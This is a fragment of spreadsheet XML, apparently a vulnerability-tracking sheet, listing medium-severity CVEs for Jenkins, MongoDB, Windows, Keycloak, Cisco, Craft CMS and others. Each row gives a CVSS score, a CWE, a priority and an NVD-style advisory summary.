      <c r="Q218" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R218" s="5" t="inlineStr">
        <is>
          <t>Jenkins Bitbucket Push and Pull Request Plugin 4.0.1 and earlier trusts values provided in the webhook payload, including certain URLs, and uses configured Bitbucket credentials to connect to those URLs, allowing attackers to capture Bitbucket credentials stored in Jenkins by sending a crafted webhook payload.</t>
        </is>
      </c>
      <c r="S218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92139</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92468</t>
        </is>
      </c>
      <c r="D219" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E219" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="inlineStr"/>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr">
        <is>
          <t>elastic</t>
        </is>
      </c>
      <c r="K219" s="5" t="inlineStr"/>
      <c r="L219" s="5" t="inlineStr"/>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr"/>
      <c r="Q219" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R219" s="5" t="inlineStr">
        <is>
          <t>zlt2000 microservices-platform through 6.0.0 contains an authorization bypass vulnerability in the search-center service that allows authenticated attackers to read any Elasticsearch index by specifying the index name in POST /search/{indexName} and GET /agg/requestStat/{indexName}/{routing} path variables. Attackers can query arbitrary indices including sys_user to retrieve sensitive user records and password hashes without proper access controls.</t>
        </is>
      </c>
      <c r="S219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92468</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92750</t>
        </is>
      </c>
      <c r="D220" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E220" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="inlineStr"/>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K220" s="5" t="inlineStr"/>
      <c r="L220" s="5" t="inlineStr"/>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr"/>
      <c r="Q220" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R220" s="5" t="inlineStr">
        <is>
          <t>Harness through 3.3.0 omits access control validation in the infrastructure provider read endpoint, allowing authenticated users to retrieve provider configurations from spaces they do not belong to. Attackers can query the GET /api/v1/infraproviders endpoint with arbitrary space identifiers to expose sensitive provider metadata including Docker endpoints, TLS certificate paths, and cloud project identifiers.</t>
        </is>
      </c>
      <c r="S220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92750</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-11222</t>
        </is>
      </c>
      <c r="D221" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E221" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F221" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K221" s="5" t="inlineStr"/>
      <c r="L221" s="5" t="inlineStr"/>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr"/>
      <c r="Q221" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="R221" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.0 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that under certain conditions could have allowed a developer user to perform actions in the context of another user's merge request commit due to a race condition issue in pipeline creation.</t>
        </is>
      </c>
      <c r="S221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-11222</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69874</t>
        </is>
      </c>
      <c r="D222" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E222" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K222" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L222" s="5" t="inlineStr"/>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr"/>
      <c r="Q222" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R222" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69874</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77887</t>
        </is>
      </c>
      <c r="D223" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E223" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F223" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K223" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L223" s="5" t="inlineStr"/>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr"/>
      <c r="Q223" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R223" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77887</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77891</t>
        </is>
      </c>
      <c r="D224" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E224" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F224" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I224" s="5" t="inlineStr"/>
      <c r="J224" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K224" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L224" s="5" t="inlineStr"/>
      <c r="M224" s="5" t="inlineStr"/>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P224" s="5" t="inlineStr"/>
      <c r="Q224" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R224" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77891</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92358</t>
        </is>
      </c>
      <c r="D225" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E225" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I225" s="5" t="inlineStr"/>
      <c r="J225" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K225" s="5" t="inlineStr"/>
      <c r="L225" s="5" t="inlineStr"/>
      <c r="M225" s="5" t="inlineStr"/>
      <c r="N225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O225" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P225" s="5" t="inlineStr"/>
      <c r="Q225" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="R225" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the first broker login flow of Keycloak. When a user confirms an account-linking request from a different browser, a temporary proof is created to validate the link. However, this proof is not properly cleared after the link is established or when the user later manually removes the link. An attacker who controls the external identity can exploit this leftover proof to silently re-establish the link and gain unauthorized access to the victims account without any further confirmation.</t>
        </is>
      </c>
      <c r="S225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92358</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20309</t>
        </is>
      </c>
      <c r="D226" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E226" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="inlineStr"/>
      <c r="I226" s="5" t="inlineStr"/>
      <c r="J226" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K226" s="5" t="inlineStr"/>
      <c r="L226" s="5" t="inlineStr"/>
      <c r="M226" s="5" t="inlineStr"/>
      <c r="N226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O226" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P226" s="5" t="inlineStr"/>
      <c r="Q226" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R226" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the interface.
This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.</t>
        </is>
      </c>
      <c r="S226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20309</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88034</t>
        </is>
      </c>
      <c r="D227" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E227" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F227" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I227" s="5" t="inlineStr"/>
      <c r="J227" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K227" s="5" t="inlineStr">
        <is>
          <t>mongodb:c\+\+_driver</t>
        </is>
      </c>
      <c r="L227" s="5" t="inlineStr"/>
      <c r="M227" s="5" t="inlineStr"/>
      <c r="N227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O227" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P227" s="5" t="inlineStr"/>
      <c r="Q227" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="R227" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in the GridFS component of the MongoDB C++ Driver can cause a caller-supplied structured file identifier to be interpreted as a query condition rather than as a literal identifier. An authenticated user who can influence the identifier passed by an affected application may obtain stored file content beyond the intended target or cause all GridFS file chunks in the affected bucket to be removed, rendering stored file content unreadable.</t>
        </is>
      </c>
      <c r="S227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88034</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88036</t>
        </is>
      </c>
      <c r="D228" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E228" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F228" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I228" s="5" t="inlineStr"/>
      <c r="J228" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K228" s="5" t="inlineStr">
        <is>
          <t>mongodb:c_driver</t>
        </is>
      </c>
      <c r="L228" s="5" t="inlineStr"/>
      <c r="M228" s="5" t="inlineStr"/>
      <c r="N228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O228" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P228" s="5" t="inlineStr"/>
      <c r="Q228" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="R228" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in the GridFS component of the MongoDB C Driver can cause a caller-supplied structured file identifier to be interpreted as a query condition rather than as a literal identifier. An authenticated user who can influence the identifier passed by an affected application may obtain stored file content beyond the intended target or cause all GridFS file chunks in the affected bucket to be removed, rendering stored file content unreadable.</t>
        </is>
      </c>
      <c r="S228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88036</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82056</t>
        </is>
      </c>
      <c r="D229" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E229" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F229" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G229" s="5" t="inlineStr"/>
      <c r="H229" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I229" s="5" t="inlineStr"/>
      <c r="J229" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K229" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L229" s="5" t="inlineStr"/>
      <c r="M229" s="5" t="inlineStr"/>
      <c r="N229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O229" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P229" s="5" t="inlineStr"/>
      <c r="Q229" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R229" s="5" t="inlineStr">
        <is>
          <t>A race condition in MongoDB server's text index query parsing can cause a heap use-after-free read when handling upsert retry paths. Under certain concurrent index lifecycle operations, a raw pointer to internal text index metadata may be dereferenced after the underlying structures have been freed, leading to a server crash. An authenticated user with readWrite privileges can trigger this condition through specific concurrent text-search and index management operations, resulting in denial of service for all connected clients. This</t>
        </is>
      </c>
      <c r="S229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82056</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82063</t>
        </is>
      </c>
      <c r="D230" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E230" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F230" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G230" s="5" t="inlineStr"/>
      <c r="H230" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I230" s="5" t="inlineStr"/>
      <c r="J230" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K230" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L230" s="5" t="inlineStr"/>
      <c r="M230" s="5" t="inlineStr"/>
      <c r="N230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O230" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P230" s="5" t="inlineStr"/>
      <c r="Q230" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R230" s="5" t="inlineStr">
        <is>
          <t>A use-after-free security issue in the cursor management component of MongoDB Server allows an authenticated user to cause a denial of service. Under specific timing conditions during cursor operations, a stale pointer to a freed resource may be retained and subsequently dereferenced during cursor cleanup, leading to a server process crash.</t>
        </is>
      </c>
      <c r="S230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82063</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70091</t>
        </is>
      </c>
      <c r="D231" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E231" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F231" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G231" s="5" t="inlineStr"/>
      <c r="H231" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I231" s="5" t="inlineStr"/>
      <c r="J231" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K231" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L231" s="5" t="inlineStr"/>
      <c r="M231" s="5" t="inlineStr"/>
      <c r="N231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O231" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P231" s="5" t="inlineStr"/>
      <c r="Q231" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R231" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows DNS allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70091</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92591</t>
        </is>
      </c>
      <c r="D232" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E232" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G232" s="5" t="inlineStr"/>
      <c r="H232" s="5" t="inlineStr"/>
      <c r="I232" s="5" t="inlineStr"/>
      <c r="J232" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K232" s="5" t="inlineStr"/>
      <c r="L232" s="5" t="inlineStr"/>
      <c r="M232" s="5" t="inlineStr"/>
      <c r="N232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O232" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P232" s="5" t="inlineStr"/>
      <c r="Q232" s="5" t="inlineStr">
        <is>
          <t>CWE-636</t>
        </is>
      </c>
      <c r="R232" s="5" t="inlineStr">
        <is>
          <t>Craft CMS 5.0.0 through 5.10.12 treats a database connection failure as meaning that Craft is not installed, which makes anonymous installer actions — including install/validate-site — reachable on an installed production site whenever PHP remains available but the configured MySQL endpoint does not. The action accepts a site name, serializes it through Site::getName(), and expands ${NAME} expressions using App::env(). An unauthenticated attacker who obtained a guest session cookie and matching CSRF token before the outage and whose session remains valid during it can submit a predictable variable name (for example Craft's conventional CRAFT_SECURITY_KEY) and receive its value, disclosing Craft secrets, process environment variables, $_SERVER entries, or PHP constants such as the security key, database credentials, or API keys. The issue requires an independently occurring database outage; the vulnerability itself provides no way to induce it. Fixed in 5.10.13.</t>
        </is>
      </c>
      <c r="S232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92591</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20120</t>
        </is>
      </c>
      <c r="D233" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E233" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G233" s="5" t="inlineStr"/>
      <c r="H233" s="5" t="inlineStr"/>
      <c r="I233" s="5" t="inlineStr"/>
      <c r="J233" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K233" s="5" t="inlineStr"/>
      <c r="L233" s="5" t="inlineStr"/>
      <c r="M233" s="5" t="inlineStr"/>
      <c r="N233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O233" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P233" s="5" t="inlineStr"/>
      <c r="Q233" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R233" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the access control list (ACL) Object Group Search (OGS) implementation of Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass configured access controls.
This vulnerability is due to a logic error in populating group access control policies (ACPs) with OGS configured. An attacker could exploit this vulnerability by sending traffic that should be blocked through the device. A successful exploit could allow the attacker to bypass access controls and reach devices in protected networks.</t>
        </is>
      </c>
      <c r="S233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20120</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20290</t>
        </is>
      </c>
      <c r="D234" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E234" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G234" s="5" t="inlineStr"/>
      <c r="H234" s="5" t="inlineStr"/>
      <c r="I234" s="5" t="inlineStr"/>
      <c r="J234" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K234" s="5" t="inlineStr"/>
